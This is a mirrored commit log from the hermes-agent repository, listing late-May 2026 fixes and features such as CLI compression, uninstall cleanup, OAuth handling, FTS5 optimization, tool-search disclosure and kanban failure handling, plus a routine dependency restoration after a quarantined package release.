hermes-agent

mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-06-10 08:32:09 +00:00

Author	SHA1	Message	Date
teknium1	fb0ab27649	fix(agent): register explainer config key + shorten footer prefix Follow-up to the salvaged #34452 turn-completion explainer: - Register display.turn_completion_explainer: True in DEFAULT_CONFIG so the setting is discoverable, matching the file_mutation_verifier precedent. - Shorten the repeated footer prefix from 'Turn ended without a usable reply: ' to 'No reply: ' so the 10 reason variants don't all open with the same 8-word boilerplate. - Update the 7 assertions that referenced the old prefix.	2026-05-29 19:23:05 -07:00
Teknium	bcc8301000	Inspired by Claude Code: /compress here [N] — boundary-aware 'summarize up to here' (#35048 ) Adds a user-chosen compression boundary to the existing /compress command. /compress here [N] summarizes everything except the most recent N exchanges (default 2), which are preserved verbatim — letting the user pick the compression boundary instead of relying on the automatic token-budget heuristic. Inspired by Claude Code's Rewind 'Summarize up to here' action (v2.1.139, Week 20, May 2026): https://code.claude.com/docs/en/whats-new/2026-w20 - hermes_cli/partial_compress.py: pure split/parse helpers + seam-alternation guard (shared by CLI and gateway). - cli.py / gateway/run.py: route 'here [N]' / '--keep N' to partial compression; compress only the head, re-append the verbatim tail through the seam guard. - Preserves message-flow role alternation (seam guard merges any illegal user->user / assistant->assistant adjacency). - Reuses the existing _compress_context session-rotation/lock machinery — no changes to the compression core. - Bare /compress (full) and /compress <focus> behavior unchanged. Tests: 12 helper unit tests + 5 CLI integration tests + E2E (interleaved tool-call transcript, degenerate/multimodal seams, real handler path).	2026-05-29 17:49:15 -07:00
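A minimal sketch of the split and seam guard described in bcc8301000, assuming messages are plain dicts with a `role` and a string `content`, and that an "exchange" starts at a user message. The names `split_keep_last` and `join_with_seam_guard` are hypothetical; they are not the helpers in `hermes_cli/partial_compress.py`.

```python
from typing import Dict, List, Tuple

Message = Dict[str, str]


def split_keep_last(messages: List[Message], keep: int = 2) -> Tuple[List[Message], List[Message]]:
    """Return (head, tail): tail holds the last `keep` exchanges verbatim."""
    user_idx = [i for i, m in enumerate(messages) if m["role"] == "user"]
    if keep <= 0:
        return list(messages), []          # keep nothing: compress everything
    if len(user_idx) <= keep:
        return [], list(messages)          # too short: nothing to compress
    cut = user_idx[-keep]                  # first message of the kept tail
    return messages[:cut], messages[cut:]


def join_with_seam_guard(summary: Message, tail: List[Message]) -> List[Message]:
    """Re-append the tail after the summary, merging same-role neighbours."""
    out = [dict(summary)]
    for msg in tail:
        if out[-1]["role"] == msg["role"]:
            # Illegal user->user or assistant->assistant adjacency: merge.
            out[-1]["content"] = out[-1]["content"] + "\n\n" + msg["content"]
        else:
            out.append(dict(msg))
    return out
```

With a summary emitted as a user message and a tail that also opens with a user message, the guard folds the two into one turn so role alternation is preserved.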
Bartok9	54aa4db1de	fix(cli): remove Hermes-managed node/npm/npx symlinks on uninstall The POSIX installer drops node/npm/npx symlinks in ~/.local/bin pointing into $HERMES_HOME/node and prepends ~/.local/bin to PATH, shadowing an existing nvm. Uninstall removed the hermes wrapper but left these behind, so the user's default node/npm/npx stayed redirected after uninstall. Add remove_node_symlinks() and call it from run_uninstall. It removes ~/.local/bin/{node,npm,npx} only when each is a symlink resolving into the current Hermes home's node dir, so a link the user repointed at nvm or a real binary is never touched. Handles dangling links too. Closes #34536	2026-05-29 17:24:38 -07:00
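The ownership check in 54aa4db1de can be sketched roughly as follows. This is an illustration under assumptions, not the repository's `remove_node_symlinks()`: the function name, its two-argument signature, and the return value are hypothetical, and only the "symlink resolving into `$HERMES_HOME/node`" rule comes from the commit message.

```python
from pathlib import Path
from typing import List


def remove_managed_node_links(bin_dir: Path, hermes_home: Path) -> List[Path]:
    """Remove node/npm/npx links in bin_dir that point into hermes_home/node."""
    node_dir = (hermes_home / "node").resolve()
    removed: List[Path] = []
    for name in ("node", "npm", "npx"):
        link = bin_dir / name
        if not link.is_symlink():
            continue  # a real binary or a missing file is never touched
        try:
            # Non-strict resolve also works for dangling links.
            target = link.resolve()
        except (OSError, RuntimeError):
            continue  # e.g. a symlink loop: leave it alone
        if target == node_dir or node_dir in target.parents:
            link.unlink()
            removed.append(link)
    return removed
```

A link the user has repointed at nvm resolves outside `node_dir`, so it survives the uninstall.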
Teknium	689ef5e233	feat(cli): warn on unsupported pip installs + fix stale update-check cache (#34491 ) (#34846 ) * docs(code-execution): document HERMES_* env narrowing + passthrough workaround The execute_code sandbox-child env scrub (`108397726`, #27303) deliberately dropped the broad HERMES_ prefix passthrough, keeping only an operational 4-var allowlist (HERMES_HOME/PROFILE/CONFIG/ENV). A script that relied on a non-secret HERMES_* var (HERMES_BASE_URL, HERMES_KANBAN_DB, HERMES__WEBHOOK, or a plugin-defined one) now sees it unset in the child. Document the behavior change and the two recovery routes (terminal.env_passthrough in config.yaml, or required_environment_variables in skill frontmatter), plus the debug log line that surfaces the drop for diagnosis. feat(cli): warn on unsupported pip installs + fix stale update-check cache after pip upgrade Banner now shows a yellow warning when detect_install_method() == 'pip': 'pip install hermes-agent' isn't the supported install path (it exists on PyPI for internal/CI reasons), so updates and issue support don't behave correctly. Reuses existing install-method detection; warn, never block. Also fixes #34491: check_for_updates() keyed its 6h cache only on ts+rev. On the pip path (no HERMES_REVISION), rev is always None, so a 'pip install --upgrade' changed VERSION but left the cache valid — the stale 'N commits behind' count survived the upgrade. Cache now also keys on the installed VERSION and invalidates on mismatch.	2026-05-29 13:30:28 -07:00
Teknium	3a2c03061c	fix(stt,tts): restore mistralai — 2.4.8 is clean, ban lifted (#34841 ) * docs(code-execution): document HERMES_* env narrowing + passthrough workaround The execute_code sandbox-child env scrub (`108397726`, #27303) deliberately dropped the broad HERMES_ prefix passthrough, keeping only an operational 4-var allowlist (HERMES_HOME/PROFILE/CONFIG/ENV). A script that relied on a non-secret HERMES_* var (HERMES_BASE_URL, HERMES_KANBAN_DB, HERMES__WEBHOOK, or a plugin-defined one) now sees it unset in the child. Document the behavior change and the two recovery routes (terminal.env_passthrough in config.yaml, or required_environment_variables in skill frontmatter), plus the debug log line that surfaces the drop for diagnosis. fix(stt,tts): restore mistralai — 2.4.8 is clean, ban lifted PyPI quarantined mistralai on 2026-05-12 after the malicious 2.4.6 release (Mini Shai-Hulud worm). 2.4.6 has since been removed from the registry and clean releases resumed (2.4.7 2026-05-25, 2.4.8 2026-05-28). This rolls back the blanket runtime ban so Voxtral STT + TTS work again, following the restoration checklist the repo left in pyproject.toml. Verified against the real SDK: 2.4.8 keeps the import path the code uses (from mistralai.client import Mistral) and the audio.transcriptions.complete / audio.speech.complete surfaces. Changes: - pyproject.toml: re-add mistral extra pinned to mistralai==2.4.8; left OUT of [all] per the 2026-05-12 lazy-install policy (one quarantined release must not break fresh installs). uv.lock regenerated. - tools/lazy_deps.py: add stt.mistral / tts.mistral entries so the SDK lazy-installs on first use (matches edge / elevenlabs). - tools/transcription_tools.py: restore explicit-provider gate (_HAS_MISTRAL + key) and auto-detect entry (local>groq>openai>mistral>xai); _transcribe_mistral lazy-installs before import. - tools/tts_tool.py: dispatcher routes back to _generate_mistral_tts; _import_mistral_client lazy-installs the SDK. 
- hermes_cli/tools_config.py, hermes_cli/web_server.py: un-hide Mistral from the TTS provider picker and dashboard STT options. - hermes_cli/security_advisories.py: KEEP the shai-hulud-2026-05 advisory (module policy forbids removal) — it is scoped to 2.4.6 only, so it still warns anyone with the poisoned build cached and never fires on 2.4.8. Summary note updated to reflect the un-quarantine. - tests: revert the disabled-behavior assertions added by the ban commit back to routing/positive expectations; add mistral to the lazy-installable-extras-excluded-from-[all] contract. Reported by @SkYNewZ (#34503). Validation: 189 targeted STT/TTS/lazy_deps/metadata tests pass; E2E with the real mistralai 2.4.8 SDK routes both STT and TTS to mistral.	2026-05-29 13:24:12 -07:00
Bartok9	3845d86b93	fix(cron): restore jobs.json emptied by config migration on update Config-version migrations have been observed to leave cron/jobs.json valid-but-empty after `hermes update`, silently dropping every scheduled job (#34600). The existing malformed-shape guards in cron/jobs.py don't catch this because {"jobs": []} is valid JSON. Add restore_cron_jobs_if_emptied() as a post-migration safety net: if the live cron/jobs.json now has zero jobs while the pre-update snapshot held one or more, restore the snapshot copy in place and warn loudly. The check is conservative — it only restores on unambiguous evidence of loss (snapshot had jobs, live file readable-and-empty), so a user who genuinely cleared their jobs is never second-guessed and an unreadable live file is left untouched so real corruption still surfaces. Wired into _cmd_update_impl after migrate_config(), reusing the existing pre-update quick snapshot (which already captures cron/jobs.json). Closes #34600	2026-05-29 13:22:54 -07:00
teknium1	a1cb5fa2c7	fix(gateway): anchor service WorkingDirectory at HERMES_HOME, not the source checkout The systemd unit (and launchd plist) pinned WorkingDirectory to PROJECT_ROOT (the checkout the unit was generated from). When that checkout is transient — a git worktree, or a clone hermes update later relocates/removes — the path rots. systemd then fails the start at the CHDIR step (status=200/CHDIR) BEFORE Python loads, so the on-boot refresh_systemd_unit_if_needed() self-heal never runs and Restart=always crash-loops forever on a dead directory. Observed in the wild: a gateway that crash-looped 153 times overnight, bot offline until a manual 'hermes gateway restart' regenerated the unit. Anchor cwd at HERMES_HOME instead — it never moves, always exists, and the gateway never needed cwd to be the checkout (ExecStart uses an absolute python + -m hermes_cli.main). Existing broken units now differ from the generated unit and self-heal on the next start/restart/update.	2026-05-29 12:36:59 -07:00
teknium1	8836b3a113	fix(cli): widen Windows .bat wrapper fix to custom-name alias path The profile alias --name path in main.py rewrote the wrapper with a hardcoded #!/bin/sh script right after create_wrapper_script(), clobbering the .bat on Windows and reintroducing the exact bug for custom aliases. create_wrapper_script() now takes an optional target so the alias file is named after the alias while the -p content references the profile — one platform-aware code path, no post-hoc rewrite.	2026-05-29 12:32:47 -07:00
liuhao1024	6312dd8c3a	fix(cli): create .bat wrapper on Windows instead of POSIX shell script On Windows, hermes profile create produced a #!/bin/sh script that the shell cannot execute. Now creates a .bat file with @echo off + %* on Windows, and keeps the POSIX shell script on macOS/Linux. Also fixes check_alias_collision to use 'where' instead of 'which' on Windows, and remove_wrapper_script to find .bat files. Fixes #34708	2026-05-29 12:32:47 -07:00
zapabob	aa283d1e4f	fix(model): isolate custom provider picker credentials	2026-05-29 12:32:35 -07:00
Teknium	27a2c4f36f	fix(mcp): stop reporting false OAuth success when no token was obtained (#34807 ) * docs(code-execution): document HERMES_* env narrowing + passthrough workaround The execute_code sandbox-child env scrub (`108397726`, #27303) deliberately dropped the broad HERMES_ prefix passthrough, keeping only an operational 4-var allowlist (HERMES_HOME/PROFILE/CONFIG/ENV). A script that relied on a non-secret HERMES_* var (HERMES_BASE_URL, HERMES_KANBAN_DB, HERMES__WEBHOOK, or a plugin-defined one) now sees it unset in the child. Document the behavior change and the two recovery routes (terminal.env_passthrough in config.yaml, or required_environment_variables in skill frontmatter), plus the debug log line that surfaces the drop for diagnosis. fix(mcp): stop reporting false OAuth success when no token was obtained `hermes mcp login` reported "Authenticated — N tool(s) available" for servers that serve tools/list without auth (e.g. Google's official Drive MCP server) even when the OAuth flow never completed — dynamic client registration 400'd because the provider doesn't support RFC 7591, so no token was ever acquired. Every real tool call then hung until timeout with no indication of why. Login now verifies a token actually landed on disk after the probe. When it didn't, it warns that authentication didn't complete and shows the config needed to supply a pre-registered client_id/client_secret (the existing, already-supported workaround for DCR-less providers). Adds a docs pitfall for Google Drive / Atlassian-style providers. Fixes #34775	2026-05-29 12:32:19 -07:00
alt-glitch	a4c18f65d4	feat(video_gen): wire Nous subscription override into hermes tools UX Add the same managed-gateway UX that image_gen already has: - TOOL_CATEGORIES['video_gen'] gets a 'Nous Subscription' provider row with managed_nous_feature='video_gen' + video_gen_plugin_name='fal' - NousSubscriptionFeatures gains a video_gen property + feature state computation (managed/active/available using the fal-queue gateway) - _GATEWAY_TOOL_LABELS, _GATEWAY_DIRECT_LABELS, _ALL_GATEWAY_KEYS, _get_gateway_direct_credentials, opted_in all include video_gen - apply_nous_managed_defaults and apply_gateway_defaults handle video_gen - _is_toolset_satisfied checks Nous features for video_gen - _is_provider_active detects managed video_gen (use_gateway + fal provider) - _select_plugin_video_gen_provider accepts use_gateway kwarg, propagated from all 4 call sites in _configure_provider when managed_feature is set - hermes setup status shows 'Video Generation (FAL via Nous subscription)' Users on a Nous subscription can now pick 'Nous Subscription' under hermes tools → Video Generation, which sets video_gen.provider=fal + video_gen.use_gateway=true. The FAL plugin's _resolve_managed_fal_video_gateway then routes through the managed queue gateway — no FAL_KEY needed.	2026-05-29 22:26:24 +05:30
teknium1	904c0b479b	refactor(state): return FTS index count from vacuum() Have vacuum() return optimize_fts()'s count so the CLI 'sessions optimize' summary uses the real merged-index count instead of probing the private _FTS_TABLES / _fts_table_exists() members.	2026-05-29 05:09:56 -07:00
kshitijk4poor	38695254f8	perf(state): merge FTS5 segments on VACUUM + add 'hermes sessions optimize' The FTS5 indexes (messages_fts, messages_fts_trigram) grow as a series of incremental b-tree segments — one per trigger-driven insert batch. SQLite's automerge caps at ~16 segments, so a long-lived store keeps scanning many segments per MATCH and never collapses them unless the special 'optimize' command runs. Nothing in the codebase ever ran it: vacuum() only fired after a prune that deleted rows, and even then never merged FTS segments. Changes: - SessionDB.optimize_fts(): merges each FTS5 index to a single segment, probing for the (optional/lazy) trigram table first so it is safe to call unconditionally. Layout-only — search results and snippet() are unchanged. - vacuum() now calls optimize_fts() before VACUUM so freed index pages are returned to the OS in the same pass. - 'hermes sessions optimize' CLI subcommand for on-demand reclamation + segment compaction (previously there was no way to compact the store without a prune deleting rows), with before/after size reporting. Benchmark (8000 msgs, fragmented to 8 segments/index): - segments 8 -> 1 on both indexes - porter MATCH 5.5x faster (0.449 -> 0.081 ms/q) - trigram MATCH 3.0x faster (0.632 -> 0.207 ms/q) - 8000 matches before == 8000 after, identical row ids (no functional change) Orthogonal to the structural FTS-size PRs (#20239 external-content, #27770 optional trigram) — segment merge helps regardless of those. Tests: TestOptimizeFts covers index count, search+snippet preservation, missing-trigram path, and idempotency. Full test_hermes_state.py green (227).	2026-05-29 05:09:56 -07:00
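The segment merge in 38695254f8 relies on SQLite's FTS5 special `'optimize'` command. A minimal sketch, assuming a Python build whose bundled SQLite includes FTS5; the table names come from the commit message, while this standalone `optimize_fts(conn)` function and its signature are illustrative rather than the actual `SessionDB` method.

```python
import sqlite3

FTS_TABLES = ("messages_fts", "messages_fts_trigram")


def optimize_fts(conn: sqlite3.Connection) -> int:
    """Merge each existing FTS5 index into one segment; return how many ran."""
    merged = 0
    for table in FTS_TABLES:
        exists = conn.execute(
            "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
            (table,),
        ).fetchone()
        if not exists:
            continue  # optional/lazy index (e.g. trigram) not created yet
        # FTS5 special command: INSERT INTO t(t) VALUES('optimize').
        # Table names are fixed constants above, never user input.
        conn.execute(f"INSERT INTO {table}({table}) VALUES('optimize')")
        merged += 1
    conn.commit()
    return merged
```

Running `VACUUM` after this call is what lets freed index pages go back to the OS, which is the ordering the commit describes.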
Teknium	5e7c2ffa9f	chore(models): gemini-3.5-flash replaces gemini-3-flash-preview in OpenRouter + Nous lists (#34581) * chore(models): swap gemini-3-flash-preview for gemini-3.5-flash in OpenRouter + Nous lists * chore(models): regenerate model-catalog.json for gemini-3.5-flash swap	2026-05-29 04:27:58 -07:00
teknium1	ddaf2f6712	style: restore PEP8 blank-line separation after dead-code removal The deletions in the salvaged commit left some top-level defs/classes separated by a single blank line. Restore the 2-blank-line separation.	2026-05-29 04:22:27 -07:00
kshitijk4poor	dc235e93cb	chore: remove dead code — 28 unused functions/classes across 16 files Vulture + per-symbol verification (whole-repo grep incl. tests, string literals, getattr, decorator/registry/argparse dispatch) confirmed each of these has zero callers anywhere — not reachable via any dynamic-dispatch path, not referenced by tests, not re-exported. Removed: - acp_adapter/tools.py: _build_patch_mode_content - agent/anthropic_adapter.py: read_claude_managed_key (diagnostics-only, never called) - agent/bedrock_adapter.py: get_bedrock_model_ids - agent/browser_registry.py: get_active_browser_provider - agent/chat_completion_helpers.py: _take_request_client (x2 nested closures, never invoked) - gateway/platforms/weixin.py: _rewrite_headers_for_weixin, _rewrite_table_block_for_weixin - hermes_cli/banner.py: _skin_branding - hermes_cli/debug.py: _delete_hint - hermes_cli/gateway.py: _setup_email, _setup_sms, _setup_yuanbao (platform keys absent from the _builtin_setup_fn dispatch dict; handled by the _setup_standard_platform fallback) - hermes_cli/kanban_db.py: set_max_runtime, active_run - hermes_cli/kanban_diagnostics.py: severity_of_highest, _latest_clean_event_ts - hermes_cli/main.py: _build_provider_choices, cmd_portal (portal subcommand is wired via portal_cli.add_parser, not this wrapper) - hermes_cli/model_switch.py: CustomAutoResult (orphaned by the switch_model() extraction) - hermes_cli/models.py: format_model_pricing_table, fetch_nous_account_tier - hermes_cli/portal_cli.py: _nous_portal_base_url - hermes_cli/proxy/server.py: handle_models_fallback (defined but never registered on the router) - tools/computer_use/cua_backend.py: _parse_element, _is_arm_mac - tools/file_operations.py: _get_safe_write_root (prod uses the imported agent.file_safety.get_safe_write_root directly) - tools/skills_tool.py: _load_category_description Also dropped two imports left unused by the removals: - tools/file_operations.py: get_safe_write_root alias - 
tools/computer_use/cua_backend.py: import platform Pure deletion: -551 LOC. No behavior change. Test files covering the edited modules pass (640/640); the broader suite's pre-existing/env-dependent failures reproduce unchanged on origin/main.	2026-05-29 04:22:27 -07:00
Teknium	e4b9532c18	feat: embedder environment-hint hook for the system prompt (#34574 ) * fix(security): block AWS SDK creds from subprocess env * fix(security): narrow Bedrock subprocess strip to inference bearer token only Scopes the AWS_SDK subprocess strip down from the full AWS credential chain to just AWS_BEARER_TOKEN_BEDROCK — the only Hermes-managed inference secret (analogous to OPENAI_API_KEY). The general AWS credential chain (AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN / AWS_PROFILE / config + role pointers) is intentionally left inheritable. Why: per SECURITY.md §3.2 the local terminal is the user's trusted operator shell. Hard-blocklisting the general chain would (a) regress every user who runs aws/terraform/cdk/boto3 in the agent terminal — not just Bedrock users, since PROVIDER_REGISTRY is iterated unconditionally at import — and (b) be unrecoverable, because env_passthrough.py refuses to re-allow anything in _HERMES_PROVIDER_ENV_BLOCKLIST (GHSA-rhgp-j443-p4rf). The narrow strip closes the reported leak (opencode enumerating the Bedrock catalog off the leaked bearer token) with no capability loss. Keeps zapabob's self-healing auth_type=="aws_sdk" mechanism so any future SDK-cred provider is covered automatically. Tests: bearer token stripped + general chain preserved (no-regression guard), on both the runtime strip path and the blocklist-membership path. Co-authored-by: zapabob <1920071390@campus.ouj.ac.jp> * feat: embedder environment-hint hook for the system prompt Adds HERMES_ENVIRONMENT_HINT env var (and config.yaml agent.environment_hint) so a host wrapping Hermes (sandbox runner, managed platform) can describe the runtime environment — proxy, credential handling, mount layout — in the system prompt's environment-hints block, without editing the identity slot (SOUL.md). Read once at prompt-build time, so it lands in the stable, cache-safe portion of the system prompt. 
Env var overrides the config key (build-time/container mechanism). Empty by default — no behavior change for existing installs. --------- Co-authored-by: zapabob <1920071390@campus.ouj.ac.jp>	2026-05-29 04:10:05 -07:00
kshitijk4poor	a22c250001	refactor(auth): remove vestigial Nous min_key_ttl/inference_auth_mode params After the legacy session-key path was removed, two parameters became dead surface on the Nous runtime-resolution chain: - min_key_ttl_seconds: del'd inside refresh_nous_oauth_pure and pass-through / telemetry-only in refresh_nous_oauth_from_state, _try_import_shared_nous_state, _nous_device_code_login, and resolve_nous_runtime_credentials. It controlled the now-deleted agent-key mint TTL and drives no behavior. - inference_auth_mode: with the legacy mode gone, AUTO and FRESH are behaviorally identical; the value only fed _normalize_nous_inference_auth_mode validation and oauth trace output, never a branch. Removing inference_auth_mode orphaned its whole supporting cluster (NOUS_INFERENCE_AUTH_MODE_AUTO/FRESH, NOUS_INFERENCE_AUTH_MODES, _normalize_nous_inference_auth_mode), and dropping min_key_ttl_seconds orphaned DEFAULT_AGENT_KEY_MIN_TTL_SECONDS — all deleted here. Updated every caller (run_agent, auxiliary_client, credential_pool, proxy adapter, runtime_provider, web_server, main, auth_commands, setup) and pruned the matching test kwargs. Deleted two tests that exercised the removed surface (test_legacy_auth_mode_is_rejected, test_try_refresh_..._accepts_explicit_auth_mode). No behavior change: net -134 LOC of dead code.	2026-05-29 02:24:48 -07:00
Robin Fernandes	7e958dafc2	fix(auth): address Nous JWT fallback review	2026-05-29 02:24:48 -07:00
Robin Fernandes	41ff6e5937	refactor(auth): Disable Nous legacy session key fallback	2026-05-29 02:24:48 -07:00
teknium1	369075dc95	feat(tools): progressive tool disclosure for MCP and plugin tools Adds Tool Search, a structured-tools progressive-disclosure layer that replaces MCP and non-core plugin tools in the model-visible tools array with three bridge tools (tool_search / tool_describe / tool_call) when the deferrable surface would consume more than a configurable percentage of the active model's context window. Core Hermes tools are never deferred. Default mode is 'auto' with a 10% context threshold, so small toolsets pay no overhead. Set tools.tool_search.enabled to 'on' to force or 'off' to disable. Design carefully reflects the OpenClaw production failure modes documented in the openclaw-tool-search-report: - Core tools never defer (toolsets._HERMES_CORE_TOOLS). Addresses the 'tools silently missing from isolated cron turns' regression class (openclaw#84141) by construction: there is no code path that can drop a core tool. - Catalog is stateless across turns — rebuilt from the live tool-defs list on every assembly. No session-keyed Map that can drift out of sync with the registry. - tool_call unwraps the bridge call before any hook fires, so plugin pre/post hooks, guardrails, approval flows, and the activity feed all see the underlying tool name, not the bridge (addresses openclaw#85588 and the verbose-mode complaint on openclaw#79823). - The unwrap happens in both the parallel and sequential paths of agent/tool_executor.py and also in handle_function_call, so direct callers (sandboxed code, eval harnesses) are covered too. - Bridge tools cannot invoke each other (recursion guard) and cannot invoke core tools (those must be called directly). - Tools mode only — no JS-sandbox code-mode. Keeps the surface small. - Token estimation via cheap char/4 heuristic; precision isn't needed for the threshold decision. Files: - tools/tool_search.py — new module (BM25 retrieval, classification, threshold gate, bridge dispatch, unwrap helper). 
- tests/tools/test_tool_search.py — 35 tests including the OpenClaw #84141 regression guard. - model_tools.py — wires assembly into _compute_tool_definitions as the final step, adds skip_tool_search_assembly kwarg so the bridge can see the real catalog, dispatches the three bridge tools. - agent/tool_executor.py — unwraps tool_call in both parallel and sequential parsing loops so checkpointing, guardrails, plugin hooks, and tool-progress callbacks all observe the underlying tool name. - hermes_cli/config.py — DEFAULT_CONFIG['tools']['tool_search'] block. - website/docs/user-guide/features/tool-search.md — user docs. Validation: - 35/35 new tests pass. - Existing tool/registry/model_tools/config/coercion/executor tests (82 + 74 + small adjacents) green. - Live E2E: 20 fake MCP tools registered, get_tool_definitions returns 3 bridges, tool_search returns top 3 hits, tool_describe returns full schema, tool_call dispatches to the real underlying handler and the underlying result is what the model sees. - Reserved-name recursion guard verified live. - Core-tool refusal via tool_call verified live.	2026-05-29 02:04:12 -07:00
Teknium	c01a2df0a3	fix(auth): don't launch a text-mode browser inside the terminal for OAuth (#34479 ) OAuth auto-open only checked _is_remote_session() (SSH + cloud-shell env vars). On a headless/CLI-only Linux box with no GUI browser, none of those trip, so webbrowser.open() resolved to a console browser (w3m/lynx/links) and launched it INSIDE the terminal — hijacking the user's TTY with the xAI 'Account Management' login page instead of letting them copy the URL. Add _can_open_graphical_browser(): returns False when webbrowser would resolve to a known console browser, when $BROWSER names one, when there's no display server on Linux, or when no browser resolves at all. Gate all 5 OAuth auto-open callsites (xAI loopback, Spotify loopback, MiniMax device code, Anthropic, Google) on it in addition to the existing remote check. Headless boxes now print the URL / fall through to manual-paste instead.	2026-05-29 01:23:06 -07:00
wysie	f32b66c758	fix: improve plugins list usability	2026-05-29 00:59:42 -07:00
Blake	26b83a5f5f	fix(cli): ignore terminal focus reports (salvage of #16780 ) Ghostty/macOS window or tab navigation (Cmd+Shift+[ / ], Alt+Tab, etc.) can deliver terminal focus reports (CSI I / CSI O) to the running TUI. prompt_toolkit does not map those sequences by default, so its parser falls back to literal key presses (ESC, [, I/O) and inserts `[I` / `[O` into the prompt buffer after the ESC byte is handled. Fix: register the two sequences as Keys.Ignore in ANSI_SEQUENCES at parser level, plus a no-op kb.add(Keys.Ignore) handler so the default self-insert path never inserts focus-report bytes. Salvage notes: original PR put the helper in cli.py. Salvaged into hermes_cli/pt_input_extras.py alongside install_shift_enter_alias / install_ctrl_enter_alias to match the established pattern for ANSI_SEQUENCES augmentation. setdefault → in-check so any prior user registration wins. Closes #16780	2026-05-29 00:31:44 -07:00
teknium1	f2d88c820c	fix(model-catalog): fall through to raw.github when Vercel 403s; swap step-3.5-flash for step-3.7-flash on OpenRouter+Nous The docs site (Vercel) serves /docs/api/model-catalog.json behind a bot mitigation rule that returns HTTP 403 + x-vercel-mitigated: challenge for non-browser User-Agents — including urllib (what the CLI uses) and curl. When that happens, get_catalog() falls back to the stale disk cache and new model releases (Opus 4.8, etc.) never reach the /model picker even though they're already in OPENROUTER_MODELS and the live OpenRouter API. Adds a fallback URL chain: when the primary catalog URL fails, walk DEFAULT_CATALOG_FALLBACK_URLS — currently the raw.githubusercontent.com copy of the same file. GitHub raw doesn't bot-gate, so the manifest stays reachable through Vercel firewall hiccups. Per-provider override URLs keep their direct-fetch semantics (operators configure those specifically, no implicit fallback). Also swaps stepfun/step-3.5-flash for stepfun/step-3.7-flash in the OpenRouter + Nous Portal curated picker lists. Native stepfun provider configuration (api.stepfun.ai) is left alone — that depends on what stepfun.ai itself serves, not what OpenRouter routes. Test plan: 5 new TestFallbackChain tests cover primary-success, primary-failure-fallback-success, all-fail, primary==fallback-dedup, and end-to-end get_catalog routing through the new helper. Existing 23 tests in test_model_catalog.py still pass (28 total). Wider tests/hermes_cli/ sweep: 5701/5701 pass.	2026-05-29 00:25:36 -07:00
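The fallback chain in f2d88c820c can be sketched as below. The helper name `fetch_with_fallback` and the injectable `fetch` callable are assumptions made so the logic is testable without network access; the commit only states that the primary URL is tried first, then `DEFAULT_CATALOG_FALLBACK_URLS`, with duplicates skipped.

```python
from typing import Callable, Iterable, Optional


def fetch_with_fallback(
    primary: str,
    fallbacks: Iterable[str],
    fetch: Callable[[str], bytes],
) -> Optional[bytes]:
    """Try primary, then each fallback once; return the first success."""
    seen = set()
    for url in [primary, *fallbacks]:
        if url in seen:
            continue  # primary == fallback: do not fetch the same URL twice
        seen.add(url)
        try:
            return fetch(url)
        except Exception:
            continue  # e.g. HTTP 403 from bot mitigation: try the next URL
    return None  # all sources failed; the caller may fall back to disk cache
```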
teknium1	592a4ffb6b	fix(kanban): close three blocked/iteration-exhausted handling gaps (#29747 ) Reporter diagnosed three independent gaps that together allowed infinite 'unblock → re-stuck' loops with no surfacing or escalation: GAP 1: `_rule_stuck_in_blocked` resets timer on any `commented`/`unblocked` event, so a task that cycles every few minutes is invisible to it regardless of how many times it cycles. Fix: new `_rule_block_unblock_cycling` rule (`hermes_cli/kanban_diagnostics.py`) that counts block→unblock cycles in a sliding window. Default threshold 3 cycles within 24h, configurable via `block_cycle_threshold` / `block_cycle_window_seconds`. Walks events in arrival order (event id) since multiple events can share the same `created_at` second. Fires as a warning with a CLI hint to inspect the block reasons. GAP 2: Iteration-budget-exhausted runs in kanban workers map to `kanban_block` (status=blocked, but a clean exit from the kernel's perspective). `_rule_repeated_failures` reads `consecutive_failures`, which `_record_task_failure` increments only for crashed/timed_out/ spawn_failed — `blocked` outcome bypasses the failure counter, so the `kanban.failure_limit` circuit breaker never trips on budget-exhaustion loops. Fix: `agent/conversation_loop.py` budget-exhaustion path now calls `_record_task_failure(outcome="timed_out")` instead of `kanban_block`. Budget exhaustion is genuinely a timeout-shaped failure (the task ran out of allowed iterations), so this is more honest semantics; it also routes through the unified failure counter, so repeated budget exhaustions trip the circuit breaker and the task auto-blocks with `gave_up` after `failure_limit` retries. GAP 3: `release_stale_claims` uses `_pid_alive(worker_pid)` only and ignores `last_heartbeat_at`. 
Reporter observed a 91-min run that held its claim with frozen heartbeat because the worker entered a logic loop with no tool calls — `_pid_alive` kept returning True so the claim was extended every 15 minutes indefinitely. Fix: heartbeat-stale backstop. If `last_heartbeat_at` is set AND older than `DEFAULT_CLAIM_HEARTBEAT_MAX_STALE_SECONDS` (default 1h), reclaim even if the PID is alive. NULL `last_heartbeat_at` preserves backward compatibility (no heartbeat yet = extend, as before). The reclaim event payload now includes a `heartbeat_stale` boolean so operators see why a live-PID worker was reclaimed. This works cleanly in concert with PR #34418 (#31752 runtime → heartbeat bridge): once `_touch_activity` keeps `last_heartbeat_at` fresh as a side effect of normal API traffic, the backstop only fires for genuinely wedged workers (no chunks, no tool results, no progress at all). Co-authored-by: baofuen <45189813+baofuen@users.noreply.github.com>	2026-05-29 00:13:29 -07:00
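The GAP 3 backstop reduces to a small decision function. A sketch under assumptions: timestamps are epoch seconds, a dead PID is always reclaimed, and the name `should_reclaim` with its tuple return is hypothetical (the commit only says the reclaim event payload carries a `heartbeat_stale` boolean).

```python
from typing import Optional, Tuple

# Stated default for DEFAULT_CLAIM_HEARTBEAT_MAX_STALE_SECONDS: 1 hour.
MAX_STALE_SECONDS = 3600.0


def should_reclaim(
    pid_alive: bool,
    last_heartbeat_at: Optional[float],
    now: float,
    max_stale: float = MAX_STALE_SECONDS,
) -> Tuple[bool, bool]:
    """Return (reclaim, heartbeat_stale) for one claimed task."""
    if not pid_alive:
        return True, False       # worker is gone: reclaim as before
    if last_heartbeat_at is None:
        return False, False      # no heartbeat yet: extend, as before
    stale = (now - last_heartbeat_at) > max_stale
    return stale, stale          # live PID but frozen heartbeat: reclaim
```

For the 91-minute run in the report, `should_reclaim(True, 0.0, 91 * 60)` yields a reclaim with `heartbeat_stale` set.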
